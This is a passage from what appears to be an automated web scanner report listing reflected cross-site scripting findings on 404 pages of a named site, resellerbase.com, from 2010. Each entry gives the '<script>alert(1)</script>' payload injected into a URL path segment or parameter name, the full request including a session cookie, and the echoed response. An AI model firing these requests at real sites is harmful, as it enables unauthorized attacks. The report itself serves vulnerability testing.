X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/?e66b4<script>alert(1)</script>e98e9db04eb=1 was not found on this server.</p>
...[SNIP]...

2.64. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 69307<script>alert(1)</script>77f21c2224c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult69307<script>alert(1)</script>77f21c2224c/media-chat/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult69307<script>alert(1)</script>77f21c2224c/media-chat/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.65. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7ae9f<script>alert(1)</script>45ac1be0e1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat7ae9f<script>alert(1)</script>45ac1be0e1c/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat7ae9f<script>alert(1)</script>45ac1be0e1c/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.66. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8cd9d<script>alert(1)</script>3586c450c08 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes8cd9d<script>alert(1)</script>3586c450c08/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes8cd9d<script>alert(1)</script>3586c450c08/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.67. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4bb38<script>alert(1)</script>6c60b3a4d06 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos4bb38<script>alert(1)</script>6c60b3a4d06/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos4bb38<script>alert(1)</script>6c60b3a4d06/images/ was not found on this server.</p>
...[SNIP]...

2.68. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 124d1<script>alert(1)</script>13e4338a152 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images124d1<script>alert(1)</script>13e4338a152/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images124d1<script>alert(1)</script>13e4338a152/ was not found on this server.</p>
...[SNIP]...

2.69. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6f3cb<script>alert(1)</script>110819ca4a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/?6f3cb<script>alert(1)</script>110819ca4a2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/?6f3cb<script>alert(1)</script>110819ca4a2=1 was not found on this server.</p>
...[SNIP]...

2.70. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 562c9<script>alert(1)</script>9dd835d5691 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult562c9<script>alert(1)</script>9dd835d5691/media-chat/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult562c9<script>alert(1)</script>9dd835d5691/media-chat/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.71. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 51dbd<script>alert(1)</script>2b28f8ccf69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat51dbd<script>alert(1)</script>2b28f8ccf69/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat51dbd<script>alert(1)</script>2b28f8ccf69/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.72. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9d67b<script>alert(1)</script>2b583d4532a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes9d67b<script>alert(1)</script>2b583d4532a/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes9d67b<script>alert(1)</script>2b583d4532a/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.73. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 19acd<script>alert(1)</script>c99a2f11ed was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos19acd<script>alert(1)</script>c99a2f11ed/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos19acd<script>alert(1)</script>c99a2f11ed/images/rating/ was not found on this server.</p>
...[SNIP]...

2.74. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a0d0c<script>alert(1)</script>50cdd7234e9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/imagesa0d0c<script>alert(1)</script>50cdd7234e9/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:32:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/imagesa0d0c<script>alert(1)</script>50cdd7234e9/rating/ was not found on this server.</p>
...[SNIP]...

2.75. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload da910<script>alert(1)</script>5a116ab659b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/ratingda910<script>alert(1)</script>5a116ab659b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/ratingda910<script>alert(1)</script>5a116ab659b/ was not found on this server.</p>
...[SNIP]...

2.76. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 44656<script>alert(1)</script>f868fe0e423 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/rating/?44656<script>alert(1)</script>f868fe0e423=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images/rating/?44656<script>alert(1)</script>f868fe0e423=1 was not found on this server.</p>
...[SNIP]...

2.77. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5921b<script>alert(1)</script>58dfe0bd91d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult5921b<script>alert(1)</script>58dfe0bd91d/media-chat/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult5921b<script>alert(1)</script>58dfe0bd91d/media-chat/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.78. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload de5ec<script>alert(1)</script>2e2e58c71b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chatde5ec<script>alert(1)</script>2e2e58c71b3/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chatde5ec<script>alert(1)</script>2e2e58c71b3/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.79. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6b948<script>alert(1)</script>97ff2aafdb7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes6b948<script>alert(1)</script>97ff2aafdb7/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes6b948<script>alert(1)</script>97ff2aafdb7/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.80. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a0c6d<script>alert(1)</script>3dd5a21c8da was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmosa0c6d<script>alert(1)</script>3dd5a21c8da/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmosa0c6d<script>alert(1)</script>3dd5a21c8da/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.81. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5f9af<script>alert(1)</script>874b109a938 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images5f9af<script>alert(1)</script>874b109a938/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/media-chat/themes/kosmos/images5f9af<script>alert(1)</script>874b109a938/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.82. http://www.resellerbase.com/adult/media-chat/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/media-chat/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload a0961<script>alert(1)</script>ceae5019b7e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/media-chat/themes/kosmos/images/ratinga0961<script>alert(1)</script>ceae5019b7e/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
